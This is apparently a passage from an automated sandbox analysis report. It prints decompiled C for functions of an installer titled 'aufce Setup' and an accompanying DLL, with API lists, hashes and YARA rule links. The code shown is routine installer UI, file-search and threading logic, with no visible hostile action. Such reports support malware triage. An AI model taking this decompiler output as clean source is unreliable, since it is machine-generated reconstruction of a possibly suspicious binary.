                • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                0x00402689
                0x0040269d
                0x004026a8
                0x004026a9
                0x004027e4
                0x0040268b
                0x0040268b
                0x0040268d
                0x0040268f
                0x0040268f
                0x004028c1
                0x004028cd

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF85BE0, Relevance: .3, Instructions: 341COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f0274d246e932e9f801ca07b7319f1b35dbc3923430caa6f0bfc74c984f1d27
                • Instruction ID: fa0a7ba78be6caea6d7d950494ee37e0cded6c9f5912b72183c5f989e4a6d47c
                • Opcode Fuzzy Hash: 2f0274d246e932e9f801ca07b7319f1b35dbc3923430caa6f0bfc74c984f1d27
                • Instruction Fuzzy Hash: 15F1015485D2EDADCB06CBF945657FCBFB05D2A102F0841CAE4E5E6283C53A938EDB21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF85BEF, Relevance: .3, Instructions: 333COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10f2e30d0e958d80375f96dc8c00001401b7246e04937c55b421c719c4296043
                • Instruction ID: bb8e476a45737321134c75de749d5673a9a280afc9ce557d07ff28a3a8d46207
                • Opcode Fuzzy Hash: 10f2e30d0e958d80375f96dc8c00001401b7246e04937c55b421c719c4296043
                • Instruction Fuzzy Hash: 36F1F05485D2EDADCB06CBF945647FCBFB05D2A102F0841CAE4E5E6283C53A938EDB25
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF856EE, Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                • Instruction ID: dca4f62d1125faa462e4c5d0bee2098d646c74657db3525b4a6fa30cd688a75b
                • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                • Instruction Fuzzy Hash: 3911C635A0010CDFDB10DFADD8848ADF7FEEF456A0B548066EC16D7214E730AE40C660
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF857DE, Relevance: .0, Instructions: 26COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                • Instruction ID: fcbeb2f0fe37fdba092ae0d829e3bc701e106175f427406987df39d88177a73c
                • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                • Instruction Fuzzy Hash: 6DE065357A06099FCB04CBACC881D15B3F8EB09230B148291EC26C73A0EB34EE00DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF8581C, Relevance: .0, Instructions: 23COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                • Instruction ID: 93d41a3d71272d705260d9c03dc9b550bdf6e37f45d99c5b6b582bc2e59271e4
                • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                • Instruction Fuzzy Hash: 77E04F327115108BC3508A1D8580952F7F9EF882B0B19446BEC66D7610C720FC01C654
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF8579F, Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x4e7cf3
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x4e6194
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x4e0f60
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                0x00403fac
                0x004040d2
                0x0040412e
                0x00404132
                0x00404209
                0x0040420b
                0x0040420b
                0x00404211
                0x00404211
                0x00404214
                0x00000000
                0x0040421b
                0x00404140
                0x00404142
                0x0040414c
                0x00404157
                0x0040415a
                0x0040415d
                0x00404168
                0x0040416b
                0x00404172
                0x00404180
                0x00404198
                0x004041a0
                0x004041ab
                0x004041bb
                0x004041bd
                0x004041bd
                0x00404172
                0x004041c7
                0x00000000
                0x004041d2
                0x004041d6
                0x004041e7
                0x004041e7
                0x004041ed
                0x004041fb
                0x004041fb
                0x00000000
                0x004041ff
                0x004041c7
                0x004040dd
                0x00000000
                0x004040f1
                0x004040f7
                0x004040fd
                0x00000000
                0x00000000
                0x00404122
                0x00404124
                0x00404129
                0x00000000
                0x00404129
                0x004040dd
                0x00403fb2
                0x00403fb5
                0x00403fba
                0x00403fbc
                0x00403fcb
                0x00403fcb
                0x00403fcd
                0x00403fd2
                0x00403fd5
                0x00403fd7
                0x00403fdc
                0x00403fe5
                0x00403feb
                0x00403ff7
                0x00403ffa
                0x00404003
                0x00404008
                0x0040400b
                0x00404010
                0x00404027
                0x0040402e
                0x00404041
                0x00404044
                0x00404059
                0x0040405b
                0x00404060
                0x00404065
                0x0040406a
                0x0040406a
                0x00404079
                0x00404088
                0x0040408a
                0x004040a0
                0x004040af
                0x004040b1
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                • String ID: N$open$.B
                • API String ID: 3615053054-720656042
                • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82880, Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 119synchronizationthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E6FF82880(void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _t45;

				_v8 = _a4;
				_t45 = _a4;
				0x6ff80000("%p %d %p\n", _t45, _a8, _a12);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					0x6ff80000(0);
					if(_t45 == 0) {
						if( *(_v8 + 8) == 0) {
							_v16 = CreateEventW(0, 0, 0, 0);
							 *(_v8 + 0x14) = _v16;
							if(_v16 != 0) {
								L11:
								 *((intOrPtr*)(_v8 + 0x10)) = _a12;
								 *(_v8 + 0xc) = _a8 * 0x3e8;
								_v20 = CreateThread(0, 0, E6FF82EC0, _v8, 0, 0);
								 *(_v8 + 8) = _v20;
								if(_v20 != 0) {
									LeaveCriticalSection(0x6ff850ac);
									return 0;
								}
								_v12 = GetLastError();
								CloseHandle( *(_v8 + 0x14));
								LeaveCriticalSection(0x6ff850ac);
								return _v12;
							}
							_v12 = GetLastError();
							LeaveCriticalSection(0x6ff850ac);
							return _v12;
						}
						_v24 =  *(_v8 + 8);
						SetEvent( *(_v8 + 0x14));
						LeaveCriticalSection(0x6ff850ac);
						WaitForSingleObject(_v24, 0xffffffff);
						EnterCriticalSection(0x6ff850ac);
						if( *_v8 == 0x50444830) {
							CloseHandle( *(_v8 + 8));
							 *(_v8 + 8) = 0;
							goto L11;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0x800007d5;
				}
			}









                0x6ff82889
                0x6ff82894
                0x6ff8289d
                0x6ff828aa
                0x6ff828b4
                0x6ff828c6
                0x00000000
                0x6ff828d6
                0x6ff828d8
                0x6ff828e2
                0x6ff82900
                0x6ff82981
                0x6ff8298a
                0x6ff82991
                0x6ff829ac
                0x6ff829b2
                0x6ff829bf
                0x6ff829d9
                0x6ff829e2
                0x6ff829e9
                0x6ff82a16
                0x00000000
                0x6ff82a1c
                0x6ff829f1
                0x6ff829fb
                0x6ff82a06
                0x00000000
                0x6ff82a0c
                0x6ff82999
                0x6ff829a1
                0x00000000
                0x6ff829a7
                0x6ff82908
                0x6ff82912
                0x6ff8291d
                0x6ff82929
                0x6ff82934
                0x6ff82943
                0x6ff82961
                0x6ff8296a
                0x00000000
                0x6ff8296a
                0x6ff8294a
                0x00000000
                0x6ff82950
                0x6ff828e9
                0x00000000
                0x6ff828ef

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF828AA
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF828C6
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF828E9
                • SetEvent.KERNEL32(?), ref: 6FF82912
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8291D
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FF82929
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82934
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8294A
                • CloseHandle.KERNEL32(?), ref: 6FF82961
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FF8297B
                • GetLastError.KERNEL32 ref: 6FF82993
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF829A1
                • CreateThread.KERNEL32 ref: 6FF829D3
                • GetLastError.KERNEL32 ref: 6FF829EB
                • CloseHandle.KERNEL32(?), ref: 6FF829FB
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A06
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseCreateEnterErrorEventHandleLast$ObjectSingleThreadWait
                • String ID: %p %d %p$0HDP$0HDP$p-w
                • API String ID: 2526439713-1736687199
                • Opcode ID: 15ee23f421c7cce957212dba39bef2b79a34ef504cfb12fd50ab0481495cd395
                • Instruction ID: 9e26eaaceed103b7c00b2e95c726e841bbef9ce75a078a2b9328904f45becd65
                • Opcode Fuzzy Hash: 15ee23f421c7cce957212dba39bef2b79a34ef504cfb12fd50ab0481495cd395
                • Instruction Fuzzy Hash: 6E514F75910208EFDB04DF98CA49B6EBBB5BF0A321F204185F926AB390D771AE40CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81EA0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E6FF81EA0(WCHAR** _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v36;
				short _v2084;
				int _t80;
				void* _t122;
				void* _t123;
				void* _t124;

				_v12 = 0;
				0x6ff80000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t124 = _t123 + 0x14;
				if(_a16 != 0) {
					0x6ff80000("unimplemented flags 0x%08x\n", _a16);
					_t124 = _t124 + 8;
				}
				if(_a4 == 0 || _a4[5] == 0 || _a4[1] == 0 || _a12 == 0) {
					return 0xc0000bbd;
				} else {
					 *((short*)(_t122 + 0xfffffffffffff7e0)) = 0;
					if( *_a4 != 0) {
						lstrcatW( &_v2084, 0x6ff86944);
						lstrcatW( &_v2084,  *_a4);
					}
					lstrcatW( &_v2084, 0x6ff8694c);
					lstrcatW( &_v2084, _a4[1]);
					if(_a4[2] != 0) {
						lstrcatW( &_v2084, 0x6ff86950);
						if(_a4[3] != 0) {
							lstrcatW( &_v2084, _a4[3]);
							lstrcatW( &_v2084, 0x6ff86954);
						}
						lstrcatW( &_v2084, _a4[2]);
						_t80 = _a4[4];
						0x6ff80000( &_v36, "#%u", _t80);
						swprintf( &_v36, _t80);
						lstrcatW( &_v2084,  &_v36);
						lstrcatW( &_v2084, 0x6ff86960);
					}
					lstrcatW( &_v2084, 0x6ff86964);
					lstrcatW( &_v2084, _a4[5]);
					_v8 = lstrlenW( &_v2084) + 1;
					if( *_a12 < _v8) {
						_v12 = 0x800007d2;
					} else {
						lstrcpyW(_a8,  &_v2084);
					}
					 *_a12 = _v8;
					return _v12;
				}
			}











                0x6ff81ea9
                0x6ff81ec5
                0x6ff81eca
                0x6ff81ed1
                0x6ff81edc
                0x6ff81ee1
                0x6ff81ee1
                0x6ff81ee8
                0x00000000
                0x6ff81f0c
                0x6ff81f16
                0x6ff81f24
                0x6ff81f32
                0x6ff81f45
                0x6ff81f45
                0x6ff81f57
                0x6ff81f6b
                0x6ff81f78
                0x6ff81f8a
                0x6ff81f97
                0x6ff81fa7
                0x6ff81fb9
                0x6ff81fb9
                0x6ff81fcd
                0x6ff81fd6
                0x6ff81fe3
                0x6ff81ff0
                0x6ff82003
                0x6ff82015
                0x6ff82015
                0x6ff82027
                0x6ff8203b
                0x6ff82051
                0x6ff8205c
                0x6ff82071
                0x6ff8205e
                0x6ff82069
                0x6ff82069
                0x6ff8207e
                0x00000000
                0x6ff82080

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrcat$lstrcpylstrlenswprintf
                • String ID: #%u$%p %p %p 0x%08x$unimplemented flags 0x%08x
                • API String ID: 332791676-533629115
                • Opcode ID: 307095165d29ec6393a97fd00ea0ce27c76da4e30f67088b35d1c08d403a74d5
                • Instruction ID: 2adef8c7920b954a05a6c037ac88030944e91c77098ddb34c964dda4b346e77b
                • Opcode Fuzzy Hash: 307095165d29ec6393a97fd00ea0ce27c76da4e30f67088b35d1c08d403a74d5
                • Instruction Fuzzy Hash: B9512875510208ABCB04DF94C984FEA77B9FB49311F048589F9299B341DB36EA98CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x4e0f60
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "aufce Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0xf02e4
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x00401019
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,?), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,aufce Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$aufce Setup
                • API String ID: 941294808-97540220
